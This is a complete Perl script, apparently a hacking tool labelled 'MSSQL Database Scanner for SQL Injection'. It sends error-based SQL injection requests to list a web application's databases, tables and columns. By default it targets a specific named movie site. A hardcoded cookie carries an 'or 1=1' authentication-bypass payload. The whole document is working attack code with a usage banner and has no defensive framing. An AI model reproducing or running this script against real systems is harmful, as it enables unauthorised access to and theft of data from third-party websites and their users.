Code: #!/usr/bin/perl $|=1; use Socket; use Getopt::Std; getopt('hpwtdi'); $host=$opt_h || "www.vod999.com"; $port=$opt_p || 80; $path=$opt_w || "/movie_detail.asp?movie_m1id=1264"; $type=$opt_t || "table_scan"; $database=$opt_d; $tab_id=$opt_i; ############################################################# #this is debug flag; $debug = 0; #this is cookie info $cookie = "cookie: ASPSESSIONIDCASCBSBQ=JMOEIMPBLNBBGIPICGDIDECN; iscookies=0; BoardList=BoardID=Show; popped=yes; upNum=0; userinfo=bw%5Fu=1%27+or+%271%27%3D%271%27%3B%2D%2D; VisitNum=1"; ############################################################# usage(); if($type eq "table_scan") { scan_db(); print "\nDatabase name scan complete!\n===================================\n"; foreach (@sqldb) { print "$_\n"; } print "===================================\n"; scan_table(@sqldb); for($i=0;$i<@sqldb;$i++) { print "\n\n============== $sqldb[$i] ==============\n\n"; @tb=split(/\n/,$table_name[$i]); @tbid=split(/\n/,$table_id[$i]); for($j=0;$j<@tb;$j++) { print "| $tb[$j]($tbid[$j])\t"; } } } elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne "")) { scan_columns($database,$tab_id); print "\n============== $database.dbo.$tab_id ==============\n\n"; foreach (@columns) { print "| $_\t"; } } sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems\n"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $| = 1; print $req; my @res = <S>; select(STDOUT); close(S); return @res; } else { die("Can't connect...\n"); } } sub scan_db() { my $i=7; my $req,$get; my $db=1; my @res; while($db ne "not found") { $get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i);--"; $req=make_request($get); @res=sendraw($req); $db=findstr(@res); if($db ne "not found") { @sqldb=(@sqldb,$db); } $i++; } } sub findstr { my @tmpres=@_; my $tmpline; my $s1,$s2,$s3; if($debug == 1) { print @tmpres; } foreach $tmpline (@tmpres) { if($tmpline=~/char.*int/isg) { $s1=0; $s2=0; $s3=0; ($s1,$s2,$s3)=split(/\'/,$tmpline); $s2=~s/ //isg; print "."; if(length($s2) > 1) { return $s2; } } } return "not found"; } sub scan_table { my @db=@_; my $req,$get; my $table=1; my @res; my $tmpstr1; my $i=0; my $tableid; foreach $db_name (@db) { $tmpstr1=""; $table=1; $get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U');--"; $req=make_request($get); @res=sendraw($req); $table=findstr(@res); $table_name[$i]=$table_name[$i]."$table\n"; $get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--"; $req=make_request($get); @res=sendraw($req); $tableid=findstr(@res); $table_id[$i]=$table_id[$i]."$tableid\n"; $tmpstr1="'$table'"; while($table ne "not found") { $get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in($tmpstr1));--"; $req=make_request($get); @res=sendraw($req); $table=findstr(@res); if($table ne "not found") { $table_name[$i]=$table_name[$i]."$table\n"; $get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--"; $req=make_request($get); @res=sendraw($req); $tableid=findstr(@res); $table_id[$i]=$table_id[$i]."$tableid\n"; } $tmpstr1=$tmpstr1.",'$table'"; } print "\nDatabase \"$db_name\" scan complete!\n"; $i++; } } sub scan_columns { my $this_db_name=shift; my $this_table_id=shift; my $get,$req,$tmpstr; my @res; $get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id);--"; $req=make_request($get); @res=sendraw($req); $column=findstr(@res); @columns=(@columns,$column); $tmpstr="'$column'"; while($column ne "not found") { $get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($tmpstr));--"; $req=make_request($get); @res=sendraw($req); $column=findstr(@res); if($column ne "not found") { @columns=(@columns,$column); $tmpstr=$tmpstr.",'$column'"; } } } sub make_request { my $getstr=shift; my $reqstr; $reqstr="GET $getstr HTTP/1.0\r\n". "HOST:$host\r\n". $cookie."\r\n\r\n"; return $reqstr; } sub usage { print qq~ =================================================== MSSQL Database Scanner for SQL Injection Codz By Envymask =================================================== Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>] -h =hostname you want to scan -p =port,80 default -w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264" -t =scan type ,only accept "table_scan" and "column_scan" -d =the database name you want to scan such as "movie",only selected "column_scan" can use this option -i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option Eg: $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641 ~; }
